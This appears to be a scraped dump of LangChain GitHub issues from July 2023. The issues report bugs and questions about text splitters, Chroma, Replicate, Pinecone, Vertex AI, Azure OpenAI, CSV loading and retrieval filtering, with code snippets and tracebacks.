### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
splitter = RecursiveCharacterTextSplitter(
chunk_size=450,
chunk_overlap=20,
length_function=len,
#separators=["\n\n", "\n", ".", " ", ""], # tried with and without this
)
```
### Expected behavior
Would like to split at newlines or period marks. | RecursiveCharacterTextSplitter strange behavior after v0.0.226 | https://api.github.com/repos/langchain-ai/langchain/issues/7485/comments | 16 | 2023-07-10T16:21:55Z | 2024-05-16T16:06:44Z | https://github.com/langchain-ai/langchain/issues/7485 | 1,797,105,833 | 7,485 |
[
"hwchase17",
"langchain"
]
| ### System Info
master
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
signature inspection for callbacks fails on tools that use chains without chain_type defined
signature inspection seems to call __eq__ which for pydantic objects calls dict() which raises NotImplemented by default
```python
> Entering new chain...
I need to find the product with the highest revenue
Action: Dataframe analysis
Action Input: the dataframe containing product and revenue information
---------------------------------------------------------------------------
NotImplementedError Traceback (most recent call last)
Cell In[24], line 1
----> 1 agent.run('which product has the highest revenue?')
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:290, in Chain.run(self, callbacks, tags, *args, **kwargs)
288 if len(args) != 1:
289 raise ValueError("`run` supports only one positional argument.")
--> 290 return self(args[0], callbacks=callbacks, tags=tags)[_output_key]
292 if kwargs and not args:
293 return self(kwargs, callbacks=callbacks, tags=tags)[_output_key]
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:166, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, include_run_info)
164 except (KeyboardInterrupt, Exception) as e:
165 run_manager.on_chain_error(e)
--> 166 raise e
167 run_manager.on_chain_end(outputs)
168 final_outputs: Dict[str, Any] = self.prep_outputs(
169 inputs, outputs, return_only_outputs
170 )
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:160, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, include_run_info)
154 run_manager = callback_manager.on_chain_start(
155 dumpd(self),
156 inputs,
157 )
158 try:
159 outputs = (
--> 160 self._call(inputs, run_manager=run_manager)
161 if new_arg_supported
162 else self._call(inputs)
163 )
164 except (KeyboardInterrupt, Exception) as e:
165 run_manager.on_chain_error(e)
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/agents/agent.py:987, in AgentExecutor._call(self, inputs, run_manager)
985 # We now enter the agent loop (until it returns something).
986 while self._should_continue(iterations, time_elapsed):
--> 987 next_step_output = self._take_next_step(
988 name_to_tool_map,
989 color_mapping,
990 inputs,
991 intermediate_steps,
992 run_manager=run_manager,
993 )
994 if isinstance(next_step_output, AgentFinish):
995 return self._return(
996 next_step_output, intermediate_steps, run_manager=run_manager
997 )
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/agents/agent.py:850, in AgentExecutor._take_next_step(self, name_to_tool_map, color_mapping, inputs, intermediate_steps, run_manager)
848 tool_run_kwargs["llm_prefix"] = ""
849 # We then call the tool on the tool input to get an observation
--> 850 observation = tool.run(
851 agent_action.tool_input,
852 verbose=self.verbose,
853 color=color,
854 callbacks=run_manager.get_child() if run_manager else None,
855 **tool_run_kwargs,
856 )
857 else:
858 tool_run_kwargs = self.agent.tool_run_logging_kwargs()
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/tools/base.py:299, in BaseTool.run(self, tool_input, verbose, start_color, color, callbacks, **kwargs)
297 except (Exception, KeyboardInterrupt) as e:
298 run_manager.on_tool_error(e)
--> 299 raise e
300 else:
301 run_manager.on_tool_end(
302 str(observation), color=color, name=self.name, **kwargs
303 )
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/tools/base.py:271, in BaseTool.run(self, tool_input, verbose, start_color, color, callbacks, **kwargs)
268 try:
269 tool_args, tool_kwargs = self._to_args_and_kwargs(parsed_input)
270 observation = (
--> 271 self._run(*tool_args, run_manager=run_manager, **tool_kwargs)
272 if new_arg_supported
273 else self._run(*tool_args, **tool_kwargs)
274 )
275 except ToolException as e:
276 if not self.handle_tool_error:
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/tools/base.py:412, in Tool._run(self, run_manager, *args, **kwargs)
405 def _run(
406 self,
407 *args: Any,
408 run_manager: Optional[CallbackManagerForToolRun] = None,
409 **kwargs: Any,
410 ) -> Any:
411 """Use the tool."""
--> 412 new_argument_supported = signature(self.func).parameters.get("callbacks")
413 return (
414 self.func(
415 *args,
(...)
420 else self.func(*args, **kwargs)
421 )
File ~/opt/anaconda3/envs/langchain/lib/python3.9/inspect.py:3113, in signature(obj, follow_wrapped)
3111 def signature(obj, *, follow_wrapped=True):
3112 """Get a signature object for the passed callable."""
-> 3113 return Signature.from_callable(obj, follow_wrapped=follow_wrapped)
File ~/opt/anaconda3/envs/langchain/lib/python3.9/inspect.py:2862, in Signature.from_callable(cls, obj, follow_wrapped)
2859 @classmethod
2860 def from_callable(cls, obj, *, follow_wrapped=True):
2861 """Constructs Signature for the given callable object."""
-> 2862 return _signature_from_callable(obj, sigcls=cls,
2863 follow_wrapper_chains=follow_wrapped)
File ~/opt/anaconda3/envs/langchain/lib/python3.9/inspect.py:2328, in _signature_from_callable(obj, follow_wrapper_chains, skip_bound_arg, sigcls)
2322 if isfunction(obj) or _signature_is_functionlike(obj):
2323 # If it's a pure Python function, or an object that is duck type
2324 # of a Python function (Cython functions, for instance), then:
2325 return _signature_from_function(sigcls, obj,
2326 skip_bound_arg=skip_bound_arg)
-> 2328 if _signature_is_builtin(obj):
2329 return _signature_from_builtin(sigcls, obj,
2330 skip_bound_arg=skip_bound_arg)
2332 if isinstance(obj, functools.partial):
File ~/opt/anaconda3/envs/langchain/lib/python3.9/inspect.py:1875, in _signature_is_builtin(obj)
1866 def _signature_is_builtin(obj):
1867 """Private helper to test if `obj` is a callable that might
1868 support Argument Clinic's __text_signature__ protocol.
1869 """
1870 return (isbuiltin(obj) or
1871 ismethoddescriptor(obj) or
1872 isinstance(obj, _NonUserDefinedCallables) or
1873 # Can't test 'isinstance(type)' here, as it would
1874 # also be True for regular python classes
-> 1875 obj in (type, object))
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/pydantic/main.py:911, in pydantic.main.BaseModel.__eq__()
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:342, in Chain.dict(self, **kwargs)
340 raise ValueError("Saving of memory is not yet supported.")
341 _dict = super().dict()
--> 342 _dict["_type"] = self._chain_type
343 return _dict
File ~/opt/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/chains/base.py:65, in Chain._chain_type(self)
63 @property
64 def _chain_type(self) -> str:
---> 65 raise NotImplementedError("Saving not supported for this chain type.")
NotImplementedError: Saving not supported for this chain type.
```
### Expected behavior
chains with unimplemented chain_type should still work | tool signature inspection for callbacks fails on certain chains | https://api.github.com/repos/langchain-ai/langchain/issues/7484/comments | 3 | 2023-07-10T16:18:29Z | 2023-10-16T16:05:14Z | https://github.com/langchain-ai/langchain/issues/7484 | 1,797,099,248 | 7,484 |
[
"hwchase17",
"langchain"
]
| ### System Info
windows.
### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [x] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
hello I am trying to use langchain with replicate_python.
https://github.com/replicate/replicate-python
However, I am confused on how to modify the max_new_token for the llm.
To specify
This is a small part of my code.
```
#main.py
llm = Replicate(
model="joehoover/falcon-40b-instruct:xxxxxxxx",
model_kwargs={ "max_length":1000},
input= { "max_length":1000})
```
I put max_length everywhere and still it isn't reflected.
According to the docs in
https://github.com/hwchase17/langchain/blob/master/langchain/llms/replicate.py
you just need to add the following:
```
from langchain.llms import Replicate
replicate = Replicate(model="stability-ai/stable-diffusion: \
27b93a2413e7f36cd83da926f365628\
0b2931564ff050bf9575f1fdf9bcd7478",
input={"image_dimensions": "512x512"})
```
However, this method is both outdated and not working.
This is the rest of my code. It is quite identical to this code:
https://github.com/hwchase17/langchain/blob/master/langchain/llms/replicate.py
```
#replicate.py
def _call(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
"""Call to replicate endpoint."""
try:
import replicate as replicate_python
except ImportError:
raise ImportError(
"Could not import replicate python package. "
"Please install it with `pip install replicate`."
)
# get the model and version
model_str, version_str = self.model.split(":")
model = replicate_python.models.get(model_str)
version = model.versions.get(version_str)
# sort through the openapi schema to get the name of the first input
input_properties = sorted(
version.openapi_schema["components"]["schemas"]["Input"][
"properties"
].items(),
key=lambda item: item[1].get("x-order", 0),
)
first_input_name = input_properties[0][0]
print("firstinput",first_input_name)
inputs = {first_input_name: prompt, **self.input}
prediction=replicate_python.predictions.create(version,input={**inputs, **kwargs},kwargs=kwargs)
print(**kwargs)
print('status',prediction.status)
while prediction.status!= 'succeeded':
prediction.reload()
print('end')
iterator = replicate_python.run(self.model, input={**inputs, **kwargs})
print("".join([output for output in iterator]))
return ''.join(prediction.output)
```
The reason i want to change the max_length or the max_new_tokens is because i am providing the llm in replicate with
a lot of context e.g. the ConversationalRetrievalChain workflow.
However, the max_length_ seems to give me truncated response because i have large chunk_sizes that are equivalent or bigger than the default max_length, which is 500.
### Expected behavior
trucated reponse(usually one-two words only) when you have chunks size equivalent or bigger than the size of the default max_token size of the llm. (500) hence i would like to change the token_size but am lost.
| Langchain-Replicate integration (max_length issue_ | https://api.github.com/repos/langchain-ai/langchain/issues/7483/comments | 2 | 2023-07-10T16:12:09Z | 2023-07-10T16:39:42Z | https://github.com/langchain-ai/langchain/issues/7483 | 1,797,089,333 | 7,483 |
[
"hwchase17",
"langchain"
]
| ### System Info
on Python 3.10.10
with requirements.txt
```
pandas==2.0.1
beautifulsoup4==4.12.2
langchain==0.0.229
chromadb==0.3.26
tiktoken==0.4.0
gradio==3.36.1
Flask==2.3.2
torch==2.0.1
sentence-transformers==2.2.2
```
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I'm getting `AttributeError: 'Chroma' object has no attribute '_client_settings'` when running
```python
from langchain.vectorstores import Chroma
import chromadb
from chromadb.config import Settings
from langchain.embeddings import HuggingFaceEmbeddings
from constants.model_constants import HF_EMBEDDING_MODEL
chroma_client = chromadb.Client(Settings(chroma_api_impl="rest", chroma_server_host="xxxxx", chroma_server_http_port="443", chroma_server_ssl_enabled=True))
embedder = HuggingFaceEmbeddings(
model_name=HF_EMBEDDING_MODEL,
model_kwargs={"device": "cpu"},
encode_kwargs={'normalize_embeddings': False}
)
chroma_vector_store = Chroma(
collection_name="test",
embedding_function=embedder,
client=chroma_client)
```
the traceback is
```
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/Users/rubelagu/.pyenv/versions/3.10.10/envs/xxxxTraceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/Users/rubelagu/.pyenv/versions/3.10.10/envs/oraklet_chatbot/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 94, in __init__
self._client_settings.persist_directory or persist_directory
AttributeError: 'Chroma' object has no attribute '_client_settings'/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 94, in __init__
self._client_settings.persist_directory or persist_directory
AttributeError: 'Chroma' object has no attribute '_client_settings'
```
### Expected behavior
It should not raise an exception,
It seems to me that
https://github.com/hwchase17/langchain/blob/5eec74d9a5435c671382e69412072a8725b2ec60/langchain/vectorstores/chroma.py#L93-L95
was introduced by commit https://github.com/hwchase17/langchain/commit/a2830e3056e4e616160b150bf5ea212a97df2dc4
from @nb-programmer and @rlancemartin
that commit assumes that self._client_settings exists always when in reality that won't be created if a client is passed
| AttributeError: 'Chroma' object has no attribute '_client_settings' | https://api.github.com/repos/langchain-ai/langchain/issues/7482/comments | 4 | 2023-07-10T15:59:17Z | 2023-07-14T11:07:15Z | https://github.com/langchain-ai/langchain/issues/7482 | 1,797,069,693 | 7,482 |
[
"hwchase17",
"langchain"
]
| ### System Info
Works in 0.0.228 but breaks in 0.0.229
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
The latest version of Langchain (0.229) seems to break working code in 0.0.228.
e.g this code works in 0.228
```python
def qna(question: str, vector_name: str, chat_history=[]):
logging.debug("Calling qna")
llm, embeddings, llm_chat = pick_llm(vector_name)
vectorstore = pick_vectorstore(vector_name, embeddings=embeddings)
retriever = vectorstore.as_retriever(search_kwargs=dict(k=3))
prompt = pick_prompt(vector_name)
logging.basicConfig(level=logging.DEBUG)
logging.debug(f"Chat history: {chat_history}")
qa = ConversationalRetrievalChain.from_llm(ChatOpenAI(model="gpt-4", temperature=0.2, max_tokens=5000),
retriever=retriever,
return_source_documents=True,
verbose=True,
output_key='answer',
combine_docs_chain_kwargs={'prompt': prompt},
condense_question_llm=OpenAI(model="gpt-3.5-turbo", temperature=0))
try:
result = qa({"question": question, "chat_history": chat_history})
except Exception as err:
error_message = traceback.format_exc()
result = {"answer": f"An error occurred while asking: {question}: {str(err)} - {error_message}"}
logging.basicConfig(level=logging.INFO)
return result
```
But in 0.229 it errors like this:
```
INFO:openai:error_code=None error_message='This is a chat model and not supported in the v1/completions endpoint. Did you mean to use v1/chat/completions?' error_param=model error_type=invalid_request_error message='OpenAI API error received' stream_error=False
```
### Expected behavior
Same output | 0.0.229 breaks existing code that works with 0.0.228 for ConverstaionalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7481/comments | 3 | 2023-07-10T15:20:34Z | 2023-07-12T00:51:00Z | https://github.com/langchain-ai/langchain/issues/7481 | 1,797,005,937 | 7,481 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.219
python 3.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
import os
from llama_index import LLMPredictor,ServiceContext,LangchainEmbedding
from langchain.embeddings.huggingface import HuggingFaceEmbeddings
from langchain.agents import Tool
from langchain.chains.conversation.memory import ConversationBufferMemory
from langchain.chat_models import AzureChatOpenAI
BASE_URL = "url"
API_KEY = "key"
DEPLOYMENT_NAME = "deployment_name"
model = AzureChatOpenAI(
openai_api_base=BASE_URL,
openai_api_version="version",
deployment_name=DEPLOYMENT_NAME,
openai_api_key=API_KEY,
openai_api_type="azure",
)
from langchain.agents import initialize_agent
from llama_index import VectorStoreIndex, SimpleDirectoryReader
documents = SimpleDirectoryReader("/Data").load_data()
llm_predictor = LLMPredictor(llm=model)
embed_model = LangchainEmbedding(HuggingFaceEmbeddings(model_name='huggingface model'))
service_context = ServiceContext.from_defaults(llm_predictor=llm_predictor,embed_model=embed_model)
index = VectorStoreIndex.from_documents(documents=documents,service_context=service_context)
tools = [
Tool(
name="LlamaIndex",
func=lambda q: str(index.as_query_engine().query(q)),
description="useful for when you want to answer questions about the author. The input to this tool should be a complete english sentence.",
return_direct=True,
),
]
memory = ConversationBufferMemory(memory_key="chat_history")
agent_executor = initialize_agent(
tools, model, agent="conversational-react-description", memory=memory
)
while True:
query = input("Enter query\n")
print(agent_executor.run(input=query))
```
Trying the above code, but when i ask queries, it shows the error - '**langchain.schema.OutputParserException: Could not parse LLM output: `Thought: Do I need to use a tool? No**'
### Expected behavior
The error should not occur | langchain.schema.OutputParserException: Could not parse LLM output: `Thought: Do I need to use a tool? No | https://api.github.com/repos/langchain-ai/langchain/issues/7480/comments | 7 | 2023-07-10T14:40:24Z | 2024-06-11T12:24:18Z | https://github.com/langchain-ai/langchain/issues/7480 | 1,796,927,559 | 7,480 |
[
"hwchase17",
"langchain"
]
| ### System Info
I have a CSV file with profile information, names, birthdate, gender, favoritemovies, etc, etc.
I need to create a chatbot with this and I am trying to use the CSVLoader like this:
```
loader = CSVLoader(file_path="profiles.csv", source_column="IdentityId")
doc = loader.load()
text_splitter = CharacterTextSplitter(chunk_size=5000, chunk_overlap=0)
#docs = text_splitter.split_documents(documents)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
docsearch = Pinecone.from_documents(doc, embed, index_name="cubigo")
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
user_input = get_text()
docs = docsearch.similarity_search(user_input)
st.write(docs)
```
However I get this error:
The file looks like this:
```
IdentityId,FirstName,LastName,Gender,Birthdate,Birthplace,Hometown,content
1A9DCDD4-DD7E-4235-BA0C-00CB0EC7FF4F,FirstName0002783,LastName0002783,Unknown,Not specified,Not Specified,Not Specified,"First Name: FirstName0002783. Last Name: LastName0002783. Role Name: Resident IL. Gender: Unknown. Phone number: Not specified. Cell Phone number: Not specified. Address2: 213. Birth Date: Not specified. Owned Technologies: Not specified. More About Me: Not Specified. Birth place: Not Specified. Home town:Not Specified. Education: Not Specified. College Name: Not Specified. Past Occupations: Not Specified. Past Interests:Not specified. Veteran: Not Specified. Name of spouse: Not specified, Religious Preferences: Not specified. Spoken Languages: Not specified. Active Live Description: Not specified. Retired Live Description: Not specified. Accomplishments: Not specified. Marital Status: Not specified. Anniversary Date: Not specified. Your typical day: Not specified. Talents and Hobbies: Not specified. Interest categories: Not specified. Other Interest Categories: Not specified. Favorite Actor: Not specified. Favorite Actress: Not specified. Favorite Animal: Not specified. Favorite Author: Not specified. Favorite Band Musical Artist: Not specified. Favorite Book: Not specified. Favorite Climate: Not specified. Favorite Color: Not specified. Favorite Dance: Not specified. Favorite Dessert: Not specified. Favorite Drink: Not specified. Favorite Food: Not specified. Favorite Fruit: Not specified. Favorite Future Travel Destination: Not specified. Favorite Movie: Not specified. Favorite Past Travel Destination: Not specified. Favorite Game: Not specified. Favorite Season Of The Year: Not specified. Favorite Song: Not specified. Favorite Sport: Not specified. Favorite Sports Team: Not specified. Favorite Tv Show: Not specified. Favorite Vegetable: Not specified. FavoritePastTravelDestination: Not specified"
D50E05C9-16EB-4554-808C-01EEDE433076,FirstName0003583,LastName0003583,Unknown,Not specified,Not Specified,Not Specified,"First Name: FirstName0003583. Last Name: LastName0003583. Role Name: Resident AL. Gender: Unknown. Phone number: Not specified. Cell Phone number: Not specified. Address2: Not specified. Birth Date: Not specified. Owned Technologies: Not specified. More About Me: Not Specified. Birth place: Not Specified. Home town:Not Specified. Education: Not Specified. College Name: Not Specified. Past Occupations: Not Specified. Past Interests:Not specified. Veteran: Not Specified. Name of spouse: Not specified, Religious Preferences: Not specified. Spoken Languages: Not specified. Active Live Description: Not specified. Retired Live Description: Not specified. Accomplishments: Not specified. Marital Status: Not specified. Anniversary Date: Not specified. Your typical day: Not specified. Talents and Hobbies: Not specified. Interest categories: Not specified. Other Interest Categories: Not specified. Favorite Actor: Not specified. Favorite Actress: Not specified. Favorite Animal: Not specified. Favorite Author: Not specified. Favorite Band Musical Artist: Not specified. Favorite Book: Not specified. Favorite Climate: Not specified. Favorite Color: Not specified. Favorite Dance: Not specified. Favorite Dessert: Not specified. Favorite Drink: Not specified. Favorite Food: Not specified. Favorite Fruit: Not specified. Favorite Future Travel Destination: Not specified. Favorite Movie: Not specified. Favorite Past Travel Destination: Not specified. Favorite Game: Not specified. Favorite Season Of The Year: Not specified. Favorite Song: Not specified. Favorite Sport: Not specified. Favorite Sports Team: Not specified. Favorite Tv Show: Not specified. Favorite Vegetable: Not specified. FavoritePastTravelDestination: Not specified"
```
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
USe this code:
```
loader = CSVLoader(file_path="profiles.csv", source_column="IdentityId")
doc = loader.load()
text_splitter = CharacterTextSplitter(chunk_size=5000, chunk_overlap=0)
#docs = text_splitter.split_documents(documents)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
docsearch = Pinecone.from_documents(doc, embed, index_name="x")
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
user_input = get_text()
docs = docsearch.similarity_search(user_input)
st.write(docs)
```
error is here:
**File "C:\Users\xx\anaconda3\envs\xx\Lib\encodings\cp1252.py", line 23, in decode
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^**
`Exception: UnicodeDecodeError: 'charmap' codec can't decode byte 0x9d in position 2810: character maps to <undefined>`
### Expected behavior
load the csv without any issue? | UnicodeDecodeError: 'charmap' codec can't decode byte 0x9d in position 2810: character maps to <undefined> | https://api.github.com/repos/langchain-ai/langchain/issues/7479/comments | 5 | 2023-07-10T14:37:28Z | 2023-10-17T16:05:34Z | https://github.com/langchain-ai/langchain/issues/7479 | 1,796,921,581 | 7,479 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
`def generate_answer(vector_store, question):
chain = load_chain("qna/configs/chains/qa_with_sources_gpt4all.json")
# print(chain)
# qa = VectorDBQAWithSourcesChain(combine_document_chain=chain, vectorstore=vector_store)
qa = RetrievalQAWithSourcesChain(combine_document_chain=chain, retriever= vector_store.as_retriever() )
result = send_prompt(qa, question)
return result`
Im experimenting chain module , so i executed above code using openai model when coming to gpt4all- groovy model. it is throwing error

### Suggestion:
Can you suggest me whether Im doing right or wrong. Does gpt4all model supported or not?
| gpt4all+langchain_chain(RetrievalQAWithSourcesChain) | https://api.github.com/repos/langchain-ai/langchain/issues/7475/comments | 3 | 2023-07-10T11:15:34Z | 2023-11-28T16:09:35Z | https://github.com/langchain-ai/langchain/issues/7475 | 1,796,536,439 | 7,475 |
[
"hwchase17",
"langchain"
]
| Hi everyone,
I'm trying to do something and I haven´t found enough information on the internet to make it work properly with Langchain. Here it is:
I want to develop a QA chat using markdown documents as knowledge source, using as relevant documents the ones corresponding to a certain documentation's version that the user will choose with a select box. To achieve that:
1. I've built a FAISS vector store from documents located in two different folders, representing the documentation's versions. The folder structure looks like this:
```
.
├── 4.14.2
│ ├── folder1
│ │ └── file1.md
│ ├── folder2
│ │ └── file2.md
└── 4.18.1
├── folder1
│ └── file3.md
└── folder2
└── file4.md
```
2. Each document's metadata looks something like this: ```{'source': 'app/docs-versions/4.14.2/folder1/file1.md'}```
3. With all this I'm using a ConversationalRetrievalChain to retrieve info from the vector store and using an llm to answer questions entered via prompt:
```python
memory = st.session_state.memory = ConversationBufferMemory(
memory_key="chat_history", return_messages=True, output_key="answer"
)
source_filter = f'app/docs-versions/{version}/'
chain = ConversationalRetrievalChain.from_llm(
llm=llm,
retriever=store.as_retriever(
search_kwargs={'filter': {'source': source_filter}}
),
memory=memory,
verbose=False,
return_source_documents=True,
)
```
As you can see, as a summary, my goal is to filter the documents retrieved to use only the ones contained in a certain directory, representing the documentation's version.
Does anyone know how can I achieve this? The approximation I've tried doesn't seem to work for what I want to do and the retrieved documents are contained in both folders. | Filtering retrieval with ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7474/comments | 5 | 2023-07-10T11:10:43Z | 2024-04-15T10:11:15Z | https://github.com/langchain-ai/langchain/issues/7474 | 1,796,527,888 | 7,474 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Adapt the pinecone vectorstore to support upcoming starter tier. The changes are related to removing namespaces and `delete by metadata` feature.
### Motivation
Indexes in upcoming Pinecone V4 won't support:
* namespaces
* `configure_index()`
* delete by metadata
* `describe_index()` with metadata filtering
* `metadata_config` parameter to `create_index()`
* `delete()` with the `deleteAll` parameter
### Your contribution
I'll do it. | Pinecone: Support starter tier | https://api.github.com/repos/langchain-ai/langchain/issues/7472/comments | 6 | 2023-07-10T10:19:16Z | 2023-07-12T19:41:36Z | https://github.com/langchain-ai/langchain/issues/7472 | 1,796,444,479 | 7,472 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I want to override `google_search_url` for the `class GoogleSearchAPIWrapper `. though it is not exist yet.
https://api.python.langchain.com/en/latest/utilities/langchain.utilities.google_search.GoogleSearchAPIWrapper.html#langchain.utilities.google_search.GoogleSearchAPIWrapper
Just like BingSearchAPIWrapper can override `bing_search_url`, I hope I can also override `google_search_url`.
https://api.python.langchain.com/en/latest/utilities/langchain.utilities.bing_search.BingSearchAPIWrapper.html#langchain.utilities.bing_search.BingSearchAPIWrapper.bing_search_url
### Motivation
I want to mock google API response.
### Your contribution
I think I am not capable of. | Add google search API url | https://api.github.com/repos/langchain-ai/langchain/issues/7471/comments | 1 | 2023-07-10T09:23:14Z | 2023-10-16T16:05:24Z | https://github.com/langchain-ai/langchain/issues/7471 | 1,796,347,569 | 7,471 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.219
Python 3.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.chat_models import AzureChatOpenAI
from langchain.schema import HumanMessage
model = AzureChatOpenAI(
openai_api_base="baseurl",
openai_api_version="version",
deployment_name="name",
openai_api_key="key",
openai_api_type="type",
)
print(model(
[
HumanMessage(
content="Translate this sentence from English to French. I love programming."
)
]
))
```
I put the relevant values(relevant configuration). Still i am getting the error - **openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again.**
### Expected behavior
It should run without any error. Because I took the code from the official documentation- https://python.langchain.com/docs/modules/model_io/models/chat/integrations/azure_chat_openai | openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again. | https://api.github.com/repos/langchain-ai/langchain/issues/7470/comments | 2 | 2023-07-10T09:11:15Z | 2023-10-16T16:05:29Z | https://github.com/langchain-ai/langchain/issues/7470 | 1,796,327,821 | 7,470 |
[
"hwchase17",
"langchain"
]
| ### Feature request
starting from 1.26.1, Vertex SDK exposes chat_history explicitly.
### Motivation
currently you can't work with chat_history if you use a fresh version of Vertex SDK
### Your contribution
yes, I'll do it. | Support new chat_history for Vertex AI | https://api.github.com/repos/langchain-ai/langchain/issues/7469/comments | 1 | 2023-07-10T08:54:03Z | 2023-07-13T05:13:31Z | https://github.com/langchain-ai/langchain/issues/7469 | 1,796,298,829 | 7,469 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.228
### Who can help?
@dev2049
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
